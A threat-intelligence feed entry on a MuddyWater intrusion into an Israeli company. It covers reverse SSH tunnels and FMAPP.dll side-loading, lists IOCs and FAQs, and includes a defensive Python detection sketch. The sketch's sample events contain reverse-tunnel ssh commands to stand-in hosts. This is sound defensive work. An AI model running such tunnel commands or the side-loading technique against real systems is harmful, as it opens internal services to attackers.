Threats Feed | MuddyWater | Last Updated: 20/03/2026 | Author: Certfa Radar | Publish Date: 06/03/2026

MuddyWater APT Intrusion Analysis: SSH Tunnels and Malicious FMAPP DLLs

  • Actor Motivations: Espionage
  • Attack Vectors: Backdoor, Malware
  • Attack Complexity: Medium
  • Threat Risk: Unknown

Threat Overview

Huntress researchers have detailed a complete attack chain attributed to the Iranian-linked APT MuddyWater, targeting an Israeli company. The intrusion began with initial access via an RDP login, followed by extensive interactive network and Active Directory reconnaissance. The threat actor demonstrated hands-on-keyboard activity, evidenced by typographical errors during command execution. To establish persistent access and bypass network controls, the attackers utilized the native Windows OpenSSH client to create reverse SSH tunnels. Subsequently, they deployed a malicious payload via DLL side-loading, leveraging the legitimate Fortemedia application (FMAPP.exe) to execute a malicious DLL (FMAPP.dll) for command-and-control communications.
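The two tradecraft elements in the overview, reverse tunnels built with the native Windows OpenSSH client and the legitimate FMAPP.exe running from a user-writable folder so that a planted FMAPP.dll beside it gets side-loaded, are both visible in process-creation telemetry. The following detection sketch is an added example, not code from Huntress or Certfa Radar: it runs two rules over constructed, Sysmon-style process events. The pipe-delimited log format, the sample command lines, the TEST-NET addresses, the Fortemedia install path and the list of user-writable directories are all assumptions made for the example; the report itself only speaks of "public folders".

```python
"""Detection sketch for the MuddyWater tradecraft described above (added example).

Rule 1: ssh.exe launched with -R, the OpenSSH remote/reverse port-forward flag.
Rule 2: FMAPP.exe executing from a user-writable directory, the precondition
        for side-loading a planted FMAPP.dll placed next to it.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# CONSTRUCTED sample events in a hypothetical "<timestamp>|<Image>|<CommandLine>"
# export. Real Sysmon Event ID 1 records are XML/EVTX; the 203.0.113.0/24
# addresses are documentation (TEST-NET-3) values, not IOCs from the report.
SAMPLE_EVENTS = [
    "2026-03-01T10:02:11|C:\\Windows\\System32\\OpenSSH\\ssh.exe|ssh.exe -N -R 2222:127.0.0.1:3389 user@203.0.113.10",
    "2026-03-01T10:05:40|C:\\Users\\Public\\Music\\FMAPP.exe|FMAPP.exe",
    "2026-03-01T10:06:02|C:\\Program Files\\Fortemedia\\FMAPP.exe|FMAPP.exe",          # assumed vendor path
    "2026-03-01T10:07:19|C:\\Windows\\System32\\OpenSSH\\ssh.exe|ssh.exe -L 8080:intranet:80 admin@203.0.113.20",
    "2026-03-01T10:09:55|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami",
    "2026-03-01T10:12:03|C:\\Windows\\System32\\OpenSSH\\ssh.exe|ssh.exe -fNR 4444:localhost:22 svc@203.0.113.30",
    "2026-03-01T10:14:48|C:\\Users\\alice\\AppData\\Local\\Temp\\FMAPP.exe|FMAPP.exe",
]


@dataclass(frozen=True)
class Event:
    timestamp: str
    image: str          # full path of the executed binary
    command_line: str


@dataclass(frozen=True)
class Hit:
    timestamp: str
    rule: str
    image: str
    command_line: str


def parse_event(line: str) -> Event:
    """Parse one line of the hypothetical pipe-delimited export."""
    ts, image, cmd = line.split("|", 2)
    return Event(ts, image, cmd)


# Assumed list of common user-writable locations (not taken from the report).
USER_WRITABLE_PREFIXES = (
    "c:\\users\\public\\",
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
)
PER_USER_TEMP_RE = re.compile(r"^c:\\users\\[^\\]+\\appdata\\local\\temp\\", re.IGNORECASE)


def in_user_writable_dir(image: str) -> bool:
    low = image.lower()
    return low.startswith(USER_WRITABLE_PREFIXES) or bool(PER_USER_TEMP_RE.match(low))


# A token such as "-R", "-R2222:..." or a bundle like "-fNR": any of OpenSSH's
# argument-less short flags may precede the R, so "-lRoot" (a -l value) is not matched.
REVERSE_FLAG_RE = re.compile(r"^-[46AaCfGgKkMNnqsTtVvXxYy]*R")


def is_reverse_ssh_tunnel(ev: Event) -> bool:
    """ssh.exe invoked with the -R remote port-forward flag (reverse tunnel)."""
    if PureWindowsPath(ev.image).name.lower() != "ssh.exe":
        return False
    return any(REVERSE_FLAG_RE.match(tok) for tok in ev.command_line.split()[1:])


def is_fmapp_from_writable_dir(ev: Event) -> bool:
    """Legitimate FMAPP.exe copied out of its install folder into a user-writable path."""
    name = PureWindowsPath(ev.image).name.lower()
    return name == "fmapp.exe" and in_user_writable_dir(ev.image)


RULES = (
    ("reverse_ssh_tunnel", is_reverse_ssh_tunnel),
    ("fmapp_in_user_writable_dir", is_fmapp_from_writable_dir),
)


def detect(lines) -> list:
    """Apply every rule to every event; return the hits in log order."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        for rule, predicate in RULES:
            if predicate(ev):
                hits.append(Hit(ev.timestamp, rule, ev.image, ev.command_line))
    return hits


if __name__ == "__main__":
    for h in detect(SAMPLE_EVENTS):
        print(f"{h.timestamp} {h.rule}: {h.image} :: {h.command_line}")
```

The forward-tunnel invocation (-L) and the FMAPP.exe launched from its vendor directory are deliberately left unflagged: the first is ordinary administrator use, and the second is what a benign install looks like, so the rules key on the reverse flag and on the out-of-place path rather than on the binary names alone.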

Detected Targets

Type     Description   Confidence
Region   Israel        Verified

Extracted IOCs

  • 589ecb0bb31adc6101b9e545a4e5e07ae2e97d464b0a62242a498e613a7740b6
  • 157[.]20.182.49
  • 162[.]0.230.185
  • 173[.]16.10.1

Tip: 4 related IOCs (3 IP, 0 domain, 0 URL, 0 email, 1 file hash) to this threat have been found.

Overlaps

MuddyWater | Operation Olalampo: MuddyWater Deploys AI-Assisted Malware in MENA Region Attacks

Source: Group IB - February 2026

Shared indicator (one match): 162[.]0.230.185

Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.

FAQs

Demystifying the MuddyWater Cyber Intrusion

An unauthorized user breached a company's computer system by logging in remotely. Once inside, they explored the network, mapped out administrative accounts, and planted a hidden program to communicate secretly with their own external servers.

Cybersecurity researchers attribute this attack to MuddyWater. MuddyWater is an Advanced Persistent Threat (APT) group that threat intelligence analysts have linked to Iranian interests.

The attack was a hands-on, interactive intrusion where the attacker manually explored the system to understand the network layout and administrative controls. By setting up hidden communication channels and a backdoor, their goal was to establish a quiet, persistent foothold for likely espionage or further network compromise.

This specific report details an isolated intrusion into a single customer's environment. However, the attacker utilized network infrastructure and IP addresses that are known to be part of a broader, documented cyber campaign.

The victim in this incident was an Israeli company. During the attack, the threat actors specifically searched for and targeted high-level employee accounts, such as IT Administrators and Domain Admins, to gain wider control.

The attackers first logged into the victim's computer using standard remote desktop software. They then used built-in Windows tools to explore the network and abused a legitimate, trusted program to load their malicious code (DLL side-loading), allowing them to evade security alerts.

An Israeli company may be highly attractive to this group due to geopolitical motives aligned with their Iranian ties. Furthermore, securing administrative accounts within the company makes it a valuable target, as it grants attackers broad control over sensitive corporate data.

Organizations should strictly secure and monitor their remote desktop connections to prevent unauthorized access. They should also use modern security tools to detect unusual programs running from public folders and block unapproved outbound network traffic.

While the cyber infrastructure used by MuddyWater is part of a larger, ongoing threat campaign, this particular event was a highly targeted, manual attack directed specifically at the Israeli company in question.